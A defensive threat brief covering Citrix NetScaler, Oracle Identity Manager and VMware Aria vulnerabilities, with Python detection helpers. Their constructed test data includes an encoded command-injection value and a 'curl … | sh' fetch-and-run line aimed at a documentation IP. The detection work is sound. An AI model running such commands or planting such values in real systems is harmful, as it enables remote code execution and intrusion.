Cyber Threat Brief — March 24 2026
Previous brief: Cyber Threat Brief — March 23 2026
Threat count: 3 new threats, 1 status update
1. Citrix NetScaler SAML Memory Leak — CVE-2026-3055
TL;DR: Unauthenticated OOB memory read (CVSS 9.3) in NetScaler ADC/Gateway appliances configured as SAML IDP disclosed March 23; no PoC yet but NetScaler is a top-tier target for exploitation within days of disclosure.
What’s New:
- Citrix published CTX696300 on March 23 for CVE-2026-3055 (OOB read) and CVE-2026-4368 (reflected XSS)
- Affects NetScaler ADC/Gateway 14.1 before 14.1-66.59, 13.1 before 13.1-62.23, and 13.1-FIPS/NDcPP before 13.1-37.262
- Only appliances configured as SAML Identity Provider are vulnerable; check ns.conf for "add authentication samlIdPProfile"
- No ITW exploitation or public PoC yet; Rapid7 and Arctic Wolf both flagged high likelihood of near-term weaponization
- Cloud-managed instances are not affected
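A quick self-check for the two conditions above (build below the fixed build, and a SAML IdP profile present in ns.conf), added here as a Python example; it is not Citrix code and not from any of the cited sources. The fixed builds are the ones this brief reproduces from CTX696300; the "NS14.1: Build 66.59.nc" version format from "show ns version" and the separate FIPS/NDcPP key are assumptions, and the ns.conf excerpt is constructed:

```python
import re

# Fixed builds from CTX696300 as reproduced in this brief, keyed by (branch, fips).
# 13.1-FIPS/NDcPP ships as 13.1-37.x, so it is keyed apart from mainline 13.1
# (a 13.1-37.x build would otherwise look like an ancient mainline build).
FIXED_BUILDS = {
    ("14.1", False): (66, 59),
    ("13.1", False): (62, 23),
    ("13.1", True): (37, 262),
}

# Accepts the advisory form "14.1-66.59" and the "NS14.1: Build 66.59.nc" form that
# "show ns version" prints (the latter format is an assumption; check your appliance).
_VERSION_RE = re.compile(r"(?:NS)?(\d+\.\d+)[-:]\s*(?:Build\s+)?(\d+)\.(\d+)")

# A SAML IdP profile in ns.conf is the brief's "configured as SAML IDP" indicator.
_SAML_IDP_RE = re.compile(r"^\s*add\s+authentication\s+samlIdPProfile\s+(\S+)", re.MULTILINE)


def parse_version(text):
    """Return (branch, build, minor_build), e.g. ('14.1', 66, 59)."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised NetScaler version: {text!r}")
    return m.group(1), int(m.group(2)), int(m.group(3))


def is_vulnerable_build(version, fips=False):
    """True if below the fixed build for its branch, False if at or above it,
    None if the branch is not one the advisory lines in this brief cover."""
    branch, build, minor = parse_version(version)
    fixed = FIXED_BUILDS.get((branch, fips))
    if fixed is None:
        return None
    return (build, minor) < fixed


def saml_idp_profiles(ns_conf):
    """Names of every SAML IdP profile defined in an ns.conf dump."""
    return _SAML_IDP_RE.findall(ns_conf)


def assess(version, ns_conf, fips=False):
    """Combine both checks into one verdict per appliance."""
    vuln = is_vulnerable_build(version, fips)
    profiles = saml_idp_profiles(ns_conf)
    if vuln is None:
        action = "branch not covered by the CTX696300 lines in this brief; verify manually"
    elif vuln and profiles:
        action = "EXPOSED: SAML IdP profile on a vulnerable build; patch now"
    elif vuln:
        action = "vulnerable build, no SAML IdP profile: not exposed to CVE-2026-3055, still patch for CVE-2026-4368"
    else:
        action = "fixed build"
    return {"vulnerable_build": vuln, "saml_idp_profiles": profiles,
            "exposed": bool(vuln and profiles), "action": action}


# Constructed ns.conf excerpt (not from any real appliance).
SAMPLE_NS_CONF = """\
set ns config -IPAddress 10.0.0.5 -netmask 255.255.255.0
add authentication samlIdPProfile idp_corp -samlIdPCertName idp_cert -samlSPCertName sp_cert
add authentication samlIdPPolicy pol_idp -rule true -action idp_corp
bind authentication vserver auth_vs -policy pol_idp -priority 100
"""

if __name__ == "__main__":
    for ver, fips in (("14.1-66.58", False), ("14.1-66.59", False),
                      ("NetScaler NS13.1: Build 37.250.nc, Date: Jan 5 2026", True)):
        print(ver, "->", assess(ver, SAMPLE_NS_CONF, fips=fips)["action"])
```

Run it against "show ns version" output and an ns.conf pulled from each appliance; a profile that exists but is unbound still counts as a hit here, which errs on the side of patching.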
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| add authentication samlIdPProfile in ns.conf | Config indicator | T1190 | NetScaler config / CLI | Audit all appliances for SAML IDP config |
| NetScaler ADC/Gateway 14.1 < 14.1-66.59, 13.1 < 13.1-62.23, 13.1-FIPS/NDcPP < 13.1-37.262 | Vuln version | T1190 | Asset inventory / VA scanner | Patch immediately |
| Anomalous SAML auth traffic to /saml/login endpoints | Exploitation indicator | T1190 | WAF / NetScaler syslog | Monitor for unusual SAML request patterns |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No specific NetScaler SAML memory read detection; gap for SAML endpoint abuse |
| Elastic | None | No NetScaler-specific rules |
| Sigma | None | No coverage; need rule for anomalous SAML IDP traffic patterns on NetScaler |
Sources: Citrix CTX696300, Rapid7 ETR, Arctic Wolf
2. Oracle Identity Manager Pre-Auth RCE — CVE-2026-21992
TL;DR: CVSS 9.8 unauthenticated RCE in Oracle Identity Manager and Web Services Manager REST endpoints; emergency out-of-band patch issued March 19. Predecessor CVE-2025-61757 was exploited ITW and added to CISA KEV in November 2025.
What’s New:
- Oracle issued emergency security alert March 19 for CVE-2026-21992, outside normal quarterly patch cycle
- Pre-auth RCE via REST WebServices (OIM) and Web Services Security (WSM) components — network-based, low complexity, no user interaction
- Affects versions 12.2.1.4.0 and 14.1.2.1.0 of both products
- CVE-2025-61757 (same component, same CVSS) was exploited ITW and added to CISA KEV November 2025 — pattern repeat highly likely
- No public PoC yet but out-of-band patch signals Oracle saw credible threat
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| OIM REST API endpoints (/iam/governance/selfservice/api/v1/) | Attack surface | T1190 | WAF / reverse proxy / OIM access logs | Block unauthenticated access; monitor for anomalous REST calls |
| Oracle Identity Manager 12.2.1.4.0, 14.1.2.1.0 | Vuln version | T1190 | Asset inventory | Apply emergency patch immediately |
| Oracle Web Services Manager 12.2.1.4.0, 14.1.2.1.0 | Vuln version | T1190 | Asset inventory | Apply emergency patch immediately |
| Unexpected child processes from OIM/WebLogic JVM | Post-exploitation | T1059 | EDR / process telemetry | Hunt for java spawning cmd.exe, sh, bash, powershell |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Oracle Identity Manager specific rules; generic “Java Process Spawning Shell” partially applicable |
| Elastic | Web Shell Detection: Script Process Child of Common Web Processes | Partial — covers post-exploitation shell spawning from web processes |
| Sigma | Suspicious Java Process Spawning Shell (generic) | Partial — needs OIM-specific process path tuning |
Sources: Oracle Security Alert, Help Net Security, Dark Reading
3. VMware Aria Operations Command Injection — CVE-2026-22719
TL;DR: CISA KEV-listed command injection (CVSS 8.1) with confirmed exploitation ITW; federal remediation deadline is today, March 24. Exploitation occurs during support-assisted migration workflows.
What’s New:
- CISA added to KEV on March 3 citing active exploitation; federal deadline March 24, 2026 (today)
- Unauthenticated command injection during support-assisted product migration — attacker-controlled input passed to OS commands without sanitization
- Broadcom acknowledged reports of exploitation but cannot independently confirm
- Companion vulns CVE-2026-22720 (stored XSS) and CVE-2026-22721 (privilege escalation to admin) patched in same bulletin
- Workaround available: aria-ops-rce-workaround.sh script, run as root on each VA node
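The injection mechanism above (attacker-controlled migration input reaching OS commands) gives the detection: shell metacharacters in migration-workflow parameters. Below is that logic as an added Python example, written for this brief and not published by Broadcom or any cited source. The access-log lines are constructed, and the /suite-api/api/migration path is a placeholder for whichever migration endpoint appears in your logs, since the page does not name it. It percent-decodes repeatedly so double-encoded payloads and $() substitution are caught, not only a literal ; | & or backtick:

```python
import json
import re
from urllib.parse import unquote, urlsplit

# The brief's separators (; | & backticks) plus newline and $( / ${ substitution,
# which survive a filter that only strips the obvious separators.
METACHAR_RE = re.compile(r"[;|&`\n]|\$\(|\$\{")

# Enough of a combined-format access-log line to get method, target and status.
ACCESS_LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so %253B (double-encoded ';') is still seen as ';'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def split_form(data):
    """Yield (name, decoded_value) from a query string or urlencoded body.
    Splits on '&' only, so an injected '&' must arrive encoded and is decoded back."""
    for pair in data.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote(name), fully_decode(value.replace("+", " "))


def _walk_json(prefix, node):
    """Yield (dotted.path, decoded string) for every string leaf in a JSON document."""
    if isinstance(node, dict):
        for key, child in node.items():
            yield from _walk_json(f"{prefix}.{key}" if prefix else key, child)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            yield from _walk_json(f"{prefix}[{i}]", child)
    elif isinstance(node, str):
        yield prefix, fully_decode(node)


def iter_params(target, body=""):
    """All parameters of one request: query string, then JSON or form body."""
    yield from split_form(urlsplit(target).query)
    body = body.strip()
    if body[:1] in ("{", "["):
        try:
            yield from _walk_json("", json.loads(body))
            return
        except ValueError:
            pass  # not JSON after all; fall through to form parsing
    if body:
        yield from split_form(body)


def suspicious_params(target, body=""):
    """Parameters whose decoded value contains a shell metacharacter."""
    return [(name, value) for name, value in iter_params(target, body)
            if METACHAR_RE.search(value)]


def scan_access_log(lines, path_marker="migration"):
    """Flag metacharacters in query parameters of requests to the migration endpoint."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = ACCESS_LINE_RE.search(line)
        if not m or path_marker not in urlsplit(m.group("target")).path:
            continue
        for name, value in suspicious_params(m.group("target")):
            hits.append({"line": lineno, "method": m.group("method"),
                         "status": m.group("status"), "param": name, "value": value})
    return hits


# Constructed access-log lines; the migration path is a placeholder, not the real endpoint.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Mar/2026:09:14:02 +0000] "POST /suite-api/api/migration?source=vrops-old.example.com HTTP/1.1" 200 512',
    '192.0.2.10 - - [24/Mar/2026:09:14:09 +0000] "POST /suite-api/api/migration?source=vrops-old.example.com%3Bid HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Mar/2026:09:15:31 +0000] "POST /suite-api/api/migration?source=x%2524%2528curl%2520198.51.100.7%2529 HTTP/1.1" 500 0',
    '203.0.113.5 - - [24/Mar/2026:09:16:00 +0000] "GET /suite-api/api/resources?name=a%7Cb HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Access logs rarely carry POST bodies, which is where a migration request's parameters most likely live; feed WAF or request-body logs through suspicious_params(target, body) to cover that, and treat the fourth sample line as the reminder that the same metacharacters on other endpoints are noise for this rule.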
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Aria Operations 8.x < 8.18.6, Cloud Foundation Ops 9.x < 9.0.2.0 | Vuln version | T1190 | Asset inventory | Patch to 8.18.6 / 9.0.2.0 or apply workaround script |
| Command separators (;, |, &, backticks) in migration API parameters | Exploitation payload | T1059.004 | Aria Operations application logs / WAF | Alert on shell metacharacters in migration workflow requests |
| Unexpected shell processes spawned by Aria Operations services | Post-exploitation | T1059.004 | EDR / process telemetry | Hunt for bash/sh child processes from Aria Ops Java/Tomcat |
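The process-spawn hunts in threats 2 and 3 (java under WebLogic, or under Aria Operations, spawning a shell) are one detection, so here is one added Python example covering both, with the OIM-specific parent tuning the Sigma gap in threat 2 asks for. It is written for this brief, not taken from any vendor or cited source. weblogic.Server is the WebLogic main class; the oim_server and wsm-pm name markers and the /usr/lib/vmware-vcops/ path are assumptions about deployment layout, and the process events are constructed:

```python
import os

# Interpreters an attacker lands in after RCE through the JVM (Linux and Windows).
SHELL_IMAGES = {"sh", "bash", "dash", "ksh", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}

# One rule per product. parent_markers are matched case-insensitively against the
# parent's command line; tags turn a hit into a component name for triage.
RULES = [
    {
        "name": "oracle_oim_wsm",
        "parent_images": {"java", "java.exe"},
        "parent_markers": ("weblogic.server",),          # WebLogic main class
        "tags": {"oim_server": "OIM", "wsm-pm": "WSM"},  # assumed managed-server names
    },
    {
        "name": "vmware_aria_ops",
        "parent_images": {"java"},
        "parent_markers": ("/usr/lib/vmware-vcops/",),   # assumed install path
        "tags": {},
    },
]


def _basename(path):
    """Lower-cased final path component, tolerant of Windows separators."""
    return os.path.basename(path.replace("\\", "/")).lower()


def classify(event):
    """Return a hit dict if a monitored JVM spawned a shell, else None."""
    if _basename(event["image"]) not in SHELL_IMAGES:
        return None
    parent = _basename(event["parent_image"])
    pcmd = event.get("parent_cmdline", "").lower()
    for rule in RULES:
        if parent in rule["parent_images"] and any(m in pcmd for m in rule["parent_markers"]):
            component = next((t for k, t in rule["tags"].items() if k in pcmd), None)
            return {"rule": rule["name"], "component": component,
                    "host": event.get("host"), "cmdline": event["cmdline"]}
    return None


def hunt(events):
    """Run classify over EDR process-creation events, keeping only hits."""
    return [hit for hit in map(classify, events) if hit]


# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "oim-app01", "parent_image": "/u01/jdk/bin/java",
     "parent_cmdline": "/u01/jdk/bin/java -Dweblogic.Name=oim_server1 -Dweblogic.ProductionModeEnabled=true weblogic.Server",
     "image": "/bin/sh", "cmdline": "/bin/sh -c id"},
    {"host": "oim-app01", "parent_image": "/u01/jdk/bin/java",
     "parent_cmdline": "/u01/jdk/bin/java -Dweblogic.Name=oim_server1 weblogic.Server",
     "image": "/u01/jdk/bin/java", "cmdline": "java -jar client.jar"},       # child is not a shell
    {"host": "ci-runner", "parent_image": "/usr/bin/java",
     "parent_cmdline": "/usr/bin/java -jar jenkins.war",
     "image": "/bin/bash", "cmdline": "bash -c ./build.sh"},                 # java, but not WebLogic
    {"host": "WSM-WIN01", "parent_image": r"C:\Oracle\jdk\bin\java.exe",
     "parent_cmdline": "java.exe -Dweblogic.Name=wsm-pm_server1 weblogic.Server",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "aria-ops01", "parent_image": "/usr/bin/java",
     "parent_cmdline": "/usr/bin/java -cp /usr/lib/vmware-vcops/tomcat/lib/* org.apache.catalina.startup.Bootstrap",
     "image": "/bin/bash", "cmdline": "bash -c 'curl 198.51.100.7/x | sh'"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Point the parent_markers at whatever your own WebLogic domain and Aria node actually show in process command lines before relying on it; a marker that never matches is a silent miss, not an alert.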
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Aria Operations-specific rules |
| Elastic | None | No VMware Aria-specific coverage |
| Sigma | None | Gap — need rule for Aria Operations migration endpoint abuse and shell spawning |
Sources: CISA KEV Catalog, BleepingComputer, SOCRadar, Qualys ThreatPROTECT
Status Updates
- CVE-2026-20131 (Cisco FMC): CISA added to KEV March 20 with federal deadline March 22 (passed). Public PoC on GitHub (p3Nt3st3r-sTAr/CVE-2026-20131-POC). Interlock ransomware exploitation ongoing since January 26. If unpatched, treat as compromised. See original brief.
- CVE-2026-22719 (VMware Aria Ops): Federal deadline today, March 24. See threat #3 above for full coverage.